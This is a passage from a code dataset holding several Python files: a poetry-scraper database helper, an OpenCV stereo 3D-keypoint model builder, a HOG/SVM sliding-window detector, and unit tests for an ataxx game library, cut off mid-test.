\",\" + spans[3].text + \"。\"\n szj[\"content\"] = content\n szj[\"title\"] = u\"节选 \"+ str(count) + \"·\" + spans[0].text\n szj[\"poet\"] = \"\"\n if len(ps) == 2:\n describe = ps[0].text + '\\n' + ps[1].text\n else:\n describe = ''\n for p in ps:\n describe += p.text + '\\n'\n\n szj[\"describe\"] = describe\n szj[\"category\"] = u\"\"\n szj[\"agg\"] = u\"三字经\"\n # print(szj)\n add_szj_to_db(szj)\n\n\n\ndef mydb():\n from sqlalchemy import create_engine\n from sqlalchemy.orm import sessionmaker, scoped_session\n from sqlalchemy.ext.declarative import declarative_base\n import pymysql\n pymysql.install_as_MySQLdb()\n\n ModelBase = declarative_base()\n import platform\n if platform.system() == \"Windows\":\n engine = create_engine('sqlite:///D:/project/notes/FSTornado/wfs.db?check_same_thread=False', echo=False)\n else:\n engine = create_engine('sqlite:////opt/midware/FSTornado/wfs.db?check_same_thread=False', echo=False)\n session_factory = sessionmaker(bind=engine)\n db_session = scoped_session(session_factory)\n return db_session\n\n\ndef add_szj_to_db(szj):\n db = mydb()\n exist = db.query(TblPoetry).filter(TblPoetry.agg == szj['agg'], TblPoetry.title == szj['title']).first()\n if exist:\n print(\"is exist\", exist.id)\n else:\n # tbl = TblPoetry(szj)\n # db.add(tbl)\n # db.commit()\n tbl = TblPoetry()\n for k,v in szj.items():\n tbl.__setattr__(k, v)\n db.add(tbl)\n db.commit()\n # print(tbl.describe)\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"FSTornado/dscrapy/sanzijing.py","file_name":"sanzijing.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"91084127","text":"# -*- coding: utf-8 -*-\r\n#\r\n\r\n'''\r\n创建参考图片的关键点特征库。\r\n\r\n'''\r\n\r\n# Python 2/3 compatibility\r\n\r\n\r\nimport argparse\r\nimport logging\r\nimport math\r\nimport os\r\nimport sys\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nFLANN_INDEX_KDTREE = 1\r\nFLANN_INDEX_LSH = 6\r\n\r\ndef load_keypoint_data(filename):\r\n npzfile = np.load(filename)\r\n keypoints = [cv2.KeyPoint(x, y, size, angle, response, int(octave), int(class_id))\r\n for x, y, size, angle, response, octave, class_id in npzfile['keypoints']]\r\n return keypoints, npzfile['descriptors']\r\n\r\ndef save_model_data(filename, keypoints, descriptors, points3d, focals, pose):\r\n '''写入 npz 格式的数据到 path 指定的文件中。'''\r\n kpdata = np.array([(kp.pt[0], kp.pt[1], kp.size, kp.angle, kp.response, kp.octave, kp.class_id)\r\n for kp in keypoints])\r\n np.savez(filename, keypoints=kpdata, descriptors=descriptors, points3d=points3d, focals=focals, pose=pose)\r\n return filename\r\n\r\ndef stereo_rectify(cameraMatrix1, distCoeffs1, cameraMatrix2, distCoeffs2, imageSize, R, T):\r\n R1, R2, P1, P2, Q, validPixROI1, validPixROI2 = cv2.stereoRectify(\r\n cameraMatrix1, distCoeffs1, cameraMatrix2, distCoeffs2, imageSize, R, T\r\n )\r\n return P1, P2, Q\r\n\r\ndef triangulate_points(projMatr1, projMatr2, projPoints1, projPoints2):\r\n points4D = cv2.triangulatePoints(projMatr1, projMatr2, projPoints1, projPoints2)\r\n return cv2.convertPointsFromHomogeneous(points4D.T);\r\n\r\ndef filter_matches(kp1, kp2, matches, ratio = 0.75):\r\n mkp1, mkp2 = [], []\r\n mi = []\r\n for m in matches:\r\n if len(m) == 2 and m[0].distance < m[1].distance * ratio:\r\n m = m[0]\r\n mkp1.append( kp1[m.queryIdx] )\r\n mkp2.append( kp2[m.trainIdx] )\r\n mi.append(m)\r\n p1 = np.float32([kp.pt for kp in mkp1])\r\n p2 = np.float32([kp.pt for kp in mkp2])\r\n kp_pairs = list(zip(mkp1, mkp2))\r\n return mi, p1, p2, list(kp_pairs)\r\n\r\ndef calibrate_match_points(T, pts1, pts2):\r\n dx, dy, dz = T.ravel()\r\n\r\n if dz != 0:\r\n logging.info(\"警告:存在深度偏移,计算结果可能有误差\")\r\n return\r\n\r\n if dx != 0 and dy != 0:\r\n logging.info(\"水平和垂直方向都有偏移,没有进行像素校准\")\r\n return\r\n\r\n if dx == 0:\r\n logging.info(\"只有垂直方向偏移,进行水平像素校准\")\r\n # pts2[:, 0] = pts1[:, 0]\r\n dt = np.mean(pts2 - pts1, axis=0)\r\n pts2[:, 0] -= dt[0]\r\n\r\n elif dy == 0:\r\n logging.info(\"只有水平方向偏移,进行垂直像素校准\")\r\n # pts2[:, 1] = pts1[:, 1]\r\n dt = np.mean(pts2 - pts1, axis=0)\r\n pts2[:, 1] -= dt[1]\r\n\r\ndef calculate_points3d(K, T, pts1, pts2):\r\n '''根据针孔相机模型和两张图片对应的像素坐标计算对应的空间三维坐标,参考\r\n 系以第一张照片拍摄位置为原点的相机坐标系,即相机正前为 Z, 向下为 Y\r\n 轴,向右为 X 轴\r\n\r\n K 是相机内参,假设两张图片使用相同的相机拍摄\r\n\r\n t 为第二张图片的偏移位置,例如 第二张图片拍摄地点在第一张图片的右侧\r\n 5cm,向前 10cm, 那么 t = (-5, 0, -10)\r\n\r\n pts1, pts2 是两张图片的匹配的像素坐标\r\n\r\n >>> t = np.float32([-4, 0, 0])\r\n >>> K = np.float32([[2380, 0, 1223], \\\r\n [0, 2380, 1631], \\\r\n [0, 0, 1]])\r\n >>> pts1 = np.float32([[1226., 1237.], \\\r\n [1097., 375.]])\r\n >>> pts2 = np.float32([[1188.,1234.8], \\\r\n [1058.40002441, 373.20001221]])\r\n >>> pt3d = [[ 0.31874507, -41.58947622, 250.5377471 ], \\\r\n [ -13.05410563, -130.24889215, 246.64372768]]\r\n >>> calculate_points3d(K, t, pts1, pts2)\r\n [array([ 0.3214155 , -41.45054333, 249.68944372]), array([ -13.02433003, -129.96615533, 246.09709895])]\r\n\r\n '''\r\n fx, fy = K[0][0], K[1][1]\r\n cx, cy = K[0][2], K[1][2]\r\n cp = np.array([K[0][2], K[1][2]])\r\n dx, dy, dz = T.ravel()\r\n\r\n n = pts1.shape[0]\r\n\r\n b1 = np.zeros(2 * n).reshape(-1, 2)\r\n b2 = ( pts2 - cp ) * dz - np.array([fx * dx, fy * dy])\r\n b = np.hstack((b1, b2))\r\n\r\n a0 = np.array([[fx, 0], [0, fy]] * n)\r\n a1 = np.hstack((a0, (-pts1 + np.array([cx, cy])).reshape(-1, 1))).reshape(-1, 2, 3)\r\n a2 = np.hstack((a0, (-pts2 + np.array([cx, cy])).reshape(-1, 1))).reshape(-1, 2, 3)\r\n a = np.stack((a1, a2), axis=1).reshape(-1, 4, 3)\r\n return [np.linalg.lstsq(a[i], b[i])[0] for i in range(n)]\r\n\r\ndef calculate_points3d_by_y(K, T, pts1, pts2):\r\n fx, fy = K[0][0], K[1][1]\r\n cx, cy = K[0][2], K[1][2]\r\n cp = np.array([K[0][2], K[1][2]])\r\n dx, dy, dz = T.ravel()\r\n\r\n n = pts1.shape[0]\r\n\r\n b1 = np.zeros(2 * n).reshape(-1, 2)\r\n b2 = ( pts2 - cp ) * dz - np.array([fx * dx, fy * dy])\r\n b = np.hstack((b1, b2))\r\n\r\n a0 = np.array([[fx, 0], [0, fy]] * n)\r\n a1 = np.hstack((a0, (-pts1 + np.array([cx, cy])).reshape(-1, 1))).reshape(-1, 2, 3)\r\n a2 = np.hstack((a0, (-pts2 + np.array([cx, cy])).reshape(-1, 1))).reshape(-1, 2, 3)\r\n a = np.stack((a1, a2), axis=1).reshape(-1, 4, 3)\r\n # 删除第三个等式\r\n a = np.delete(a, 2, axis=1)\r\n b = np.delete(b, 2, axis=1)\r\n return [np.linalg.lstsq(a[i], b[i])[0] for i in range(n)]\r\n\r\ndef make_models(config, kp1, desc1, kp2, desc2):\r\n flann_params= dict(algorithm = FLANN_INDEX_LSH,\r\n table_number = 6, # 12\r\n key_size = 12, # 20\r\n multi_probe_level = 1) #2\r\n matcher = cv2.FlannBasedMatcher(flann_params, {}) # bug : need to pass empty dict (#1329)\r\n\r\n raw_matches = matcher.knnMatch(desc1, trainDescriptors = desc2, k = 2) #2\r\n logging.info('KFLANN 匹配数目: %s', len(raw_matches))\r\n\r\n mi, p1, p2, kp_pairs = filter_matches(kp1, kp2, raw_matches)\r\n logging.info('过滤之后匹配数目: %s', len(kp_pairs))\r\n # p1 = cv2.KeyPoint_convert(kp_pairs[0])\r\n # p1 = cv2.KeyPoint_convert(kp_pairs[1])\r\n\r\n H, status = None, None\r\n if len(p1) >= 4:\r\n if config.homography:\r\n H, status = cv2.findHomography(p1, p2, cv2.RANSAC, 3.0)\r\n logging.info('使用 Homograph 过滤之后匹配数目: %s', np.count_nonzero(status))\r\n elif config.fundamental:\r\n H, status = cv2.findFundamentalMat(p1, p2)\r\n logging.info('使用 Fundamental 过滤之后匹配数目: %s', np.count_nonzero(status))\r\n if status is None:\r\n status = np.ones(len(kp_pairs), np.bool_)\r\n\r\n pts1 = np.float64([kpp[0].pt for kpp, flag in zip(kp_pairs, status) if flag])\r\n pts2 = np.float64([kpp[1].pt for kpp, flag in zip(kp_pairs, status) if flag])\r\n\r\n w, h = [int(x) for x in config.size.split(',')]\r\n T = np.float64([float(x) for x in config.refpos.split(',')])\r\n fx, fy = [float(x) for x in config.focals.split(',')]\r\n cx, cy = (w-1)/2, (h-1)/2\r\n\r\n # change by devecor\r\n # previous:\r\n # K = np.float64([[w*fx, 0, cx],\r\n # [0, h*fy, cy],\r\n # [0, 0, 1]])\r\n if config.intrinsicMatrix == None:\r\n K = np.float64([[w*fx, 0, cx],\r\n [0, h*fy, cy],\r\n [0, 0, 1]])\r\n else:\r\n f_x, f_y, c_x, c_y = [float(i) for i in config.intrinsicMatrix.split(',')]\r\n K = np.float64([[f_x, 0, c_x],\r\n [0, f_y, c_y],\r\n [0, 0, 1]])\r\n # changes over ----by devecor\r\n\r\n if config.myself:\r\n # 校正匹配点\r\n # 如果是水平偏移,那么两张照片匹配点的垂直像素修改为相等\r\n # 如果是垂直平移,那么两张照片匹配点的水平像素修改为相等\r\n # calibrate_match_points(T, pts1, pts2)\r\n pt3s = calculate_points3d(K, T, pts1, pts2)\r\n else:\r\n E, mask = cv2.findEssentialMat(pts1, pts2, K)\r\n retval, R, t, mask = cv2.recoverPose(E, pts1, pts2, K)\r\n distCoeffs = np.zeros(4)\r\n P1, P2, Q = stereo_rectify(K, distCoeffs, K, distCoeffs, (h, w), R, T)\r\n pt3s = triangulate_points(P1, P2, pts1.T, pts2.T).reshape(-1, 3)\r\n\r\n if config.save:\r\n output = '' if config.output is None else config.output \r\n oname = os.path.splitext(os.path.basename(config.image[0]))[0]\r\n filename = os.path.join(output, oname.rsplit('-', 1)[0])\r\n # 过滤三维坐标点中 z 值小于 0 的或者特别大的(>config.maximum)\r\n status3 = np.ones(len(pt3s))\r\n for i in range(len(pt3s)):\r\n if pt3s[i][2] < 0:\r\n status3[i] = 0\r\n elif pt3s[i][2] > config.maximum:\r\n status3[i] = 0\r\n kps = [kpp[0] for kpp, flag in zip(kp_pairs, status) if flag]\r\n des = [desc1[m.queryIdx] for m, flag in zip(mi, status) if flag]\r\n kps = [k for k, flag in zip(kps, status3) if flag]\r\n des = [d for d, flag in zip(des, status3) if flag]\r\n pts = [p for p, flag in zip(pt3s, status3) if flag]\r\n n = len(pts)\r\n logging.info(\"保存计算得到关键点( 共 %s 个)的三维坐标到文件: %s\", n, filename)\r\n pose = np.zeros(4) if config.pose is None else np.array([float(x) for x in config.pose.split(',')])\r\n save_model_data(filename, kps, des, pts, np.array([fx, fy]), pose)\r\n rname = os.path.splitext(os.path.basename(config.refimage[0]))[0]\r\n filename = os.path.join(output, \"model-%s-%s.txt\" % (oname, rname))\r\n with open(filename, \"w\") as f:\r\n f.write(\"%-16s %-16s %-10s\\n\" % (oname, rname, n))\r\n # for i in range(len(pts)):\r\n # pt = kps[i].pt\r\n # print(\"%d: (%d, %d) -> (%8.2f %8.2f %8.2f)\" %( i, pt[0], pt[1], pts[i][0], pts[i][1], pts[i][2]))\r\n\r\n if config.show:\r\n logging.info(\"计算得到的三维坐标信息如下:\")\r\n _u, index = np.unique(pts1, axis=0, return_index=True)\r\n j = 0\r\n for i in index:\r\n if pt3s[i][2] < 0:\r\n logging.info('%-4d %s, %s: %s', j, np.int32(pts1[i]), np.int32(pts2[i]), \"无效结果\")\r\n elif pt3s[i][2] > config.maximum:\r\n logging.info('%-4d %s, %s: %s(%8.2f)', j, np.int32(pts1[i]), np.int32(pts2[i]), \"距离太远\", pt3s[i][2])\r\n else:\r\n logging.info('%-4d %s, %s: %s', j, np.int32(pts1[i]), np.int32(pts2[i]), pt3s[i])\r\n j += 1\r\n\r\ndef main(params=None):\r\n parser = argparse.ArgumentParser(description='生成图片的三维特征点文件')\r\n parser.add_argument('image', metavar='IMAGE', nargs=1, help='图片对应的特征文件')\r\n parser.add_argument('refimage', metavar='REFIMAGE', nargs=1, help='参考图片对应的特征文件')\r\n parser.add_argument('--pose', help='图片的位置坐标 x,y,z,a')\r\n parser.add_argument('--refpos', help='参考图片拍摄位置相对偏移量 dx,dy,dz')\r\n parser.add_argument('--size', required=True, help='图片大小 w,h')\r\n parser.add_argument('--show', action='store_true', help='打印获取到的关键点三维信息')\r\n parser.add_argument('--save', action='store_true', help='保存三维关键点数据')\r\n parser.add_argument('--myself', action='store_true', help='使用自己的算法计算三维坐标')\r\n parser.add_argument('--output', metavar=\"path\", help='输出文件的路径')\r\n parser.add_argument('--homography', action='store_true', help='使用 Homography 进行过滤 ')\r\n parser.add_argument('--fundamental', action='store_true', help='使用 fundamental 过滤匹配结果')\r\n parser.add_argument('--focals', metavar=\"fx,fy\", help='相机内参(fx,fy)')\r\n parser.add_argument('--maximum', metavar=\"D\", type=int, default=3000, help='最远的三维关键点距离,单位是厘米')\r\n # add by devecor\r\n parser.add_argument('-K', '--intrinsicMatrix', metavar='fx,fy,cx,cy', default=None, help='内参矩阵 若指定了此参数 --focals将失效')\r\n # add end ----devecor\r\n args = parser.parse_args(params)\r\n\r\n for filename in args.image + args.refimage:\r\n if not os.path.exists(filename):\r\n logging.info('输入文件 %s 不存在', filename)\r\n return\r\n\r\n kp1, des1 = load_keypoint_data(args.image[0])\r\n kp2, des2 = load_keypoint_data(args.refimage[0])\r\n make_models(args, kp1, des1, kp2, des2)\r\n\r\nif __name__ == '__main__':\r\n # 单元测试\r\n # python -m doctest -v make_model.py\r\n\r\n logging.basicConfig(format='%(message)s', level=logging.INFO)\r\n # HUAWEI SLA00 FOCAL: 0.9722,0.7292 size: 2448,3264\r\n # HUAWEI G80 FOCAL: 1.15,0.85\r\n # IPHONE 6S FOCAL: 1.167,0.875 size: 3024,4032\r\n main()\r\n","sub_path":"src/single/make_model.py","file_name":"make_model.py","file_ext":"py","file_size_in_byte":12775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"73166136","text":"\"\"\" Description here\n\nAuthor: Leonard Berrada\nDate: 20 Jan 2016\n\"\"\"\n\nimport numpy as np\nfrom PIL import Image\nimport cPickle as pickle\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\n\n\nfrom detection_utils import HOG2, plot_polygon, generate_square, save_mat\n\nmy_file = \"./pics/leo.jpg\"\n\nmy_array = np.array(Image.open(my_file))\nif my_array.ndim > 2:\n my_array = np.max(my_array, axis=2)\nmy_mat = np.array(my_array, dtype=np.uint8)\n\nsvm_model = pickle.load(open('svm_model.p', 'rb'))\n\nscales = [0.5, 0.25, 0.125]\n(h_original, v_original) = np.shape(my_mat)\n\nsquares = []\nm = -10.\n\nfor scale in scales:\n step = int(v_original * scale / 8)\n size = min(int(h_original * scale), int(v_original * scale))\n i = 0\n while i + size <= h_original:\n j = 0\n while j + size <= v_original:\n hogg = HOG2(my_mat[i:i + size, j:j + size])\n score = float(svm_model.decision_function(hogg))\n if score > 0.5:\n print(score)\n squares.append(generate_square(i, j, size, size))\n save_mat(my_mat[i:i + size, j:j + size])\n if score > m:\n m = score\n j += step\n i += step\n\n# cv2.imshow('frame', frame)\nprint(\"Best score : %.2f\" % m)\nfor square in squares:\n plot_polygon(square)\nplt.imshow(my_mat, cmap = cm.Greys_r)\nplt.show()","sub_path":"src/py/deprecated/3/bootstrapping.py","file_name":"bootstrapping.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65657831","text":"import ataxx\nimport ataxx.players\nimport ataxx.pgn\nimport random\nimport string\nimport copy\nimport unittest\n\nclass TestMethods(unittest.TestCase):\n def test_fen(self):\n fens = [\n \"x5o/7/7/7/7/7/o5x x 0 1\",\n \"x5o/7/2-1-2/7/2-1-2/7/o5x o 0 1\",\n \"x5o/7/2-1-2/3-3/2-1-2/7/o5x x 0 1\",\n \"x5o/7/3-3/2-1-2/3-3/7/o5x o 0 1\"\n ]\n\n for fen in fens:\n board = ataxx.Board(fen)\n self.assertTrue(board.get_fen() == fen)\n\n fens = [\n \"\",\n \"a x 0 1\",\n \"x5o/7/7/7/7/7/o5x a 0 1\",\n \"x5o/7/7/7/7/7/o5x x a 1\",\n \"x5o/7/7/7/7/7/o5x x 0 a\",\n \"x5o/7/7/7/7/7/o5x x 0 1 a\",\n \"x5o/7/7/7/7/7/o5x x -5 1\",\n \"x5o/7/7/7/7/7/o5x x 0 -5\"\n ]\n\n for fen in fens:\n board = ataxx.Board()\n self.assertTrue(board.set_fen(fen) != True)\n\n def test_perft(self):\n positions = [\n {\"fen\": \"7/7/7/7/7/7/7 x\", \"nodes\": [1, 0, 0, 0, 0]},\n {\"fen\": \"x5o/7/7/7/7/7/o5x x\", \"nodes\": [1, 16, 256, 6460, 155888]},\n {\"fen\": \"x5o/7/2-1-2/7/2-1-2/7/o5x o\", \"nodes\": [1, 14, 196, 4184, 86528]},\n {\"fen\": \"x5o/7/2-1-2/3-3/2-1-2/7/o5x x\", \"nodes\": [1, 14, 196, 4100, 83104]},\n {\"fen\": \"x5o/7/3-3/2-1-2/3-3/7/o5x o\", \"nodes\": [1, 16, 256, 5948, 133264]},\n {\"fen\": \"7/7/7/7/2-----/2-----/2--x1o x\", \"nodes\": [1, 1, 0, 0, 0]},\n {\"fen\": \"7/7/7/7/2-----/2-----/2--x1o o\", \"nodes\": [1, 1, 0, 0, 0]},\n ]\n\n depth = 4\n for position in positions:\n fen = position[\"fen\"]\n board = ataxx.Board(fen)\n for idx, nodes in enumerate(position[\"nodes\"]):\n if idx > depth:\n break\n self.assertTrue(board.perft(idx) == nodes)\n\n def test_single_double(self):\n fens = [\n \"x5o/7/7/7/7/7/o5x x\",\n \"x5o/7/2-1-2/7/2-1-2/7/o5x o\",\n \"x5o/7/2-1-2/3-3/2-1-2/7/o5x x\",\n \"x5o/7/3-3/2-1-2/3-3/7/o5x o\"\n ]\n\n for fen in fens:\n board = ataxx.Board(fen)\n for move in board.legal_moves():\n self.assertTrue(move.is_single() != move.is_double())\n\n def test_from_san(self):\n fens = [\n \"x5o/7/7/7/7/7/o5x x\",\n \"x5o/7/2-1-2/7/2-1-2/7/o5x o\",\n \"x5o/7/2-1-2/3-3/2-1-2/7/o5x x\",\n \"x5o/7/3-3/2-1-2/3-3/7/o5x o\"\n ]\n\n for fen in fens:\n board = ataxx.Board(fen)\n for move in board.legal_moves():\n self.assertTrue(ataxx.Move.from_san(str(move)) == move)\n\n def test_null_move(self):\n nullmove = ataxx.Move.null()\n\n self.assertTrue(nullmove == ataxx.Move(-1, -1, -1, -1))\n self.assertTrue(nullmove == ataxx.Move.null())\n self.assertTrue(nullmove != ataxx.Move(0, 0, 0, 0))\n self.assertTrue(str(nullmove) == \"0000\")\n\n board1 = ataxx.Board()\n board2 = ataxx.Board()\n\n # Make the null move\n board2.makemove(nullmove)\n\n pieces1, turn1, halfmoves1, _ = board1.get_fen().split(\" \")\n pieces2, turn2, halfmoves2, _ = board2.get_fen().split(\" \")\n\n # Check changes made\n self.assertTrue(pieces1 == pieces2)\n self.assertTrue(turn1 != turn2)\n self.assertTrue(int(halfmoves1)+1 == int(halfmoves2))\n\n def test_single_equality(self):\n nums = [0,1,2,3,4,5,6]\n squares = [[f,r] for f in nums for r in nums]\n\n for sq_to in squares:\n a, b, c, d = sq_to + sq_to\n move1 = ataxx.Move(a, b, c, d)\n\n for sq_from in squares:\n a, b, c, d = sq_from + sq_to\n move2 = ataxx.Move(a, b, c, d)\n\n if move2.is_single():\n self.assertTrue(move1 == move2)\n elif move2.is_double():\n self.assertTrue(move1 != move2)\n\n def test_set_get(self):\n nums = [0,1,2,3,4,5,6]\n squares = [[f,r] for f in nums for r in nums]\n board = ataxx.Board(\"empty\")\n\n for x, y in squares:\n for piece in [ataxx.BLACK, ataxx.WHITE, ataxx.GAP, ataxx.EMPTY]:\n board.set(x, y, piece)\n self.assertTrue(piece == board.get(x, y))\n\n def test_main_line(self):\n for _ in range(10):\n history = []\n\n # Play random moves on the board\n board1 = ataxx.Board(\"startpos\")\n while not board1.gameover() and len(history) < 50:\n moves = board1.legal_moves()\n move = random.choice(moves)\n board1.makemove(move)\n history.append(move)\n\n # Replay the moves on a new board\n board2 = ataxx.Board(\"startpos\")\n for move in board1.main_line():\n board2.makemove(move)\n\n self.assertTrue(board1.main_line() == history)\n self.assertTrue(board1.get_fen() == board2.get_fen())\n\n def test_players(self):\n positions = [\n {\"fen\": \"x5o/7/7/7/7/7/o5x x\", \"moves\": [\"f1\", \"f2\", \"g2\", \"a6\", \"b6\", \"b7\"]},\n {\"fen\": \"x5o/7/2-1-2/7/2-1-2/7/o5x o\", \"moves\": [\"a2\", \"b1\", \"b2\", \"g6\", \"f6\", \"f7\"]},\n {\"fen\": \"x5o/7/2-1-2/3-3/2-1-2/7/o5x x\", \"moves\": [\"f1\", \"f2\", \"g2\", \"a6\", \"b6\", \"b7\"]},\n {\"fen\": \"x5o/7/3-3/2-1-2/3-3/7/o5x o\", \"moves\": [\"a2\", \"b1\", \"b2\", \"g6\", \"f6\", \"f7\"]},\n {\"fen\": \"7/3o3/7/3x3/7/7/7 x\", \"moves\": [\"c5\", \"d5\", \"e5\"]},\n {\"fen\": \"3o3/7/7/3x3/7/7/7 x\", \"moves\": [\"d4c6\", \"d4d6\", \"d4e6\"]},\n {\"fen\": \"3o3/7/3x3/3x3/7/7/7 x\", \"moves\": [\"c6\", \"d6\", \"e6\"]},\n {\"fen\": \"o4oo/7/x5x/7/7/7/7 x\", \"moves\": [\"f6\", \"g6\"]},\n {\"fen\": \"7/3o3/7/3x3/7/7/3oo2 x\", \"moves\": [\"d4d2\", \"d4e2\"]},\n {\"fen\": \"7/7/7/7/7/7/7 x\", \"moves\": [\"0000\"]}\n ]\n\n for position in positions:\n fen = position[\"fen\"]\n moves = position[\"moves\"]\n\n # Greedy player\n board = ataxx.Board(fen)\n for _ in range(100):\n move = ataxx.players.greedy(board)\n self.assertTrue(str(move) in moves)\n\n def test_make_undo(self):\n fens = [\n \"x5o/7/7/7/7/7/o5x x 0 1\",\n \"x5o/7/2-1-2/7/2-1-2/7/o5x o 0 1\",\n \"x5o/7/2-1-2/3-3/2-1-2/7/o5x x 0 1\",\n \"x5o/7/3-3/2-1-2/3-3/7/o5x o 0 1\",\n \"7/3o3/7/3x3/7/7/3oo2 x 0 1\"\n ]\n\n for fen in fens:\n board = ataxx.Board(fen)\n\n while not board.gameover() and board.halfmove_clock < 500:\n current_fen = board.get_fen()\n\n # Test all legal moves\n for move in board.legal_moves():\n board.makemove(move)\n board.undo()\n self.assertTrue(board.get_fen() == current_fen)\n\n # Test null move\n board.makemove(ataxx.Move.null())\n board.undo()\n self.assertTrue(board.get_fen() == current_fen)\n\n # Pick a random move and keep going\n move = random.choice(board.legal_moves())\n board.makemove(move)\n\n # Undo every move in the game\n while board.main_line():\n board.undo()\n\n # Make sure we're back where we started\n self.assertTrue(board.get_fen() == fen)\n\n def test_pgn(self):\n def random_phrase(n):\n return ''.join(random.choices(string.ascii_uppercase + string.ascii_lowercase + string.punctuation + string.digits + \" \", k=n))\n\n pgns = [\n \"[Event \\\"Example 1\\\"]\\n[Black \\\"Player 1\\\"]\\n[White \\\"Player 2\\\"]\\n[UTCDate \\\"1970.01.01\\\"]\\n[UTCTime \\\"00:00:00\\\"]\\n[FEN \\\"x5o/7/7/7/7/7/o5x x\\\"]\\n[Result \\\"*\\\"]\\n\\n1. a7c5 a2 2. g2 *\",\n \"[Event \\\"Example 2\\\"]\\n[Black \\\"Player 1\\\"]\\n[White \\\"Player 2\\\"]\\n[UTCDate \\\"1970.01.01\\\"]\\n[UTCTime \\\"00:00:00\\\"]\\n[FEN \\\"x5o/7/7/7/7/7/o5x x\\\"]\\n[Result \\\"*\\\"]\\n\\n1. a7c5 { Test 123 } 1... a2 { Test } 2. g2 *\",\n \"[Event \\\"Example 3\\\"]\\n[Black \\\"Player 1\\\"]\\n[White \\\"Player 2\\\"]\\n[UTCDate \\\"1970.01.01\\\"]\\n[UTCTime \\\"00:00:00\\\"]\\n[FEN \\\"x5o/7/7/7/7/7/o5x x\\\"]\\n[Result \\\"*\\\"]\\n\\n1. a7c7 (1. a7c5 { Test }) 1... g7f5 (1... a2 { Test } 2. g2 (2. f2 { Test })) 2. g1f3 a1b3 { Test 123 } *\",\n \"[Event \\\"Example 4\\\"]\\n[Black \\\"Player 1\\\"]\\n[White \\\"Player 2\\\"]\\n[UTCDate \\\"1970.01.01\\\"]\\n[UTCTime \\\"00:00:00\\\"]\\n[FEN \\\"x5o/7/7/7/7/7/o5x x\\\"]\\n[Result \\\"*\\\"]\\n\\n1. a7c7 { Test } (1. a7c5 { Test }) 1... g7f5 (1... a2 { Test } 2. g2 (2. f2 { Test } 2... a1c2)) 2. g1f3 a1b3 { Test 123 } *\"\n ]\n\n # Test some known pgn strings\n for pgn in pgns:\n self.assertTrue(str(ataxx.pgn.parse(pgn)) == pgn)\n\n # Try parse some random games\n # These won't have variations or comments in them\n for _ in range(10):\n board = ataxx.Board()\n while not board.gameover() and board.halfmove_clock < 500:\n move = ataxx.players.random_move(board)\n board.makemove(move)\n\n pgn = ataxx.pgn.Game()\n pgn.headers[\"Event\"] = random_phrase(12)\n pgn.headers[\"Black\"] = random_phrase(12)\n pgn.headers[\"White\"] = random_phrase(12)\n pgn.headers[\"FEN\"] = ataxx.FEN_STARTPOS\n pgn.headers[\"Result\"] = board.result()\n pgn.from_board(board)\n\n # Human readable pgn string\n pgn_string = str(pgn)\n\n # Test: pgn string ---> pgn ---> pgn string\n self.assertTrue(str(ataxx.pgn.parse(pgn_string)) == pgn_string)\n\n # Check the pgn main line matches the board\n moves = [n.move for n in pgn.main_line()]\n self.assertTrue(moves == board.main_line())\n\n # Create a pgn ourselves\n game = ataxx.pgn.Game()\n game.headers[\"FEN\"] = ataxx.FEN_STARTPOS\n game.headers[\"Result\"] = \"*\"\n node = game.add_variation(ataxx.Move.from_san(\"g2\"), comment=\"First move\")\n node = node.add_variation(ataxx.Move.from_san(\"a1a3\"), comment=\"Second move\")\n self.assertTrue(str(game) == \"[Event \\\"Example\\\"]\\n[FEN \\\"x5o/7/7/7/7/7/o5x x 0 1\\\"]\\n[Result \\\"*\\\"]\\n\\n1. g2 { First move } a1a3 { Second move } *\")\n\n def test_result(self):\n positions = [\n {\"fen\": \"x5o/7/7/7/7/7/o5x x\", \"result\": \"*\"},\n {\"fen\": \"x5o/7/7/7/7/7/o5x o\", \"result\": \"*\"},\n {\"fen\": \"x5o/7/2-1-2/7/2-1-2/7/o5x x\", \"result\": \"*\"},\n {\"fen\": \"x5o/7/2-1-2/7/2-1-2/7/o5x o\", \"result\": \"*\"},\n {\"fen\": \"x6/7/7/7/7/7/7 x\", \"result\": \"1-0\"},\n {\"fen\": \"x6/7/7/7/7/7/7 o\", \"result\": \"1-0\"},\n {\"fen\": \"o6/7/7/7/7/7/7 x\", \"result\": \"0-1\"},\n {\"fen\": \"o6/7/7/7/7/7/7 o\", \"result\": \"0-1\"},\n {\"fen\": \"1xxxxxx/xxxxxxx/xxxxxxx/xxxxooo/ooooooo/ooooooo/ooooooo x\", \"result\": \"*\"},\n {\"fen\": \"1xxxxxx/xxxxxxx/xxxxxxx/xxxxooo/ooooooo/ooooooo/ooooooo o\", \"result\": \"*\"},\n {\"fen\": \"1oooooo/ooooooo/ooooooo/ooooxxx/xxxxxxx/xxxxxxx/xxxxxxx x\", \"result\": \"*\"},\n {\"fen\": \"1oooooo/ooooooo/ooooooo/ooooxxx/xxxxxxx/xxxxxxx/xxxxxxx o\", \"result\": \"*\"},\n {\"fen\": \"xxxxxxx/xxxxxxx/xxxxxxx/xxxxooo/ooooooo/ooooooo/ooooooo x\", \"result\": \"1-0\"},\n {\"fen\": \"xxxxxxx/xxxxxxx/xxxxxxx/xxxxooo/ooooooo/ooooooo/ooooooo o\", \"result\": \"1-0\"},\n {\"fen\": \"ooooooo/ooooooo/ooooooo/ooooxxx/xxxxxxx/xxxxxxx/xxxxxxx x\", \"result\": \"0-1\"},\n {\"fen\": \"ooooooo/ooooooo/ooooooo/ooooxxx/xxxxxxx/xxxxxxx/xxxxxxx o\", \"result\": \"0-1\"},\n {\"fen\": \"7/7/7/7/7/7/7 o\", \"result\": \"1/2-1/2\"},\n {\"fen\": \"x5o/7/7/7/7/7/o5x x 99 0\", \"result\": \"*\"},\n {\"fen\": \"x5o/7/7/7/7/7/o5x x 100 0\", \"result\": \"1/2-1/2\"},\n {\"fen\": \"x5o/7/7/7/7/7/o5x x 0 400\", \"result\": \"*\"},\n {\"fen\": \"x5o/7/7/7/7/7/o5x x 0 401\", \"result\": \"1/2-1/2\"},\n ]\n\n for position in positions:\n fen = 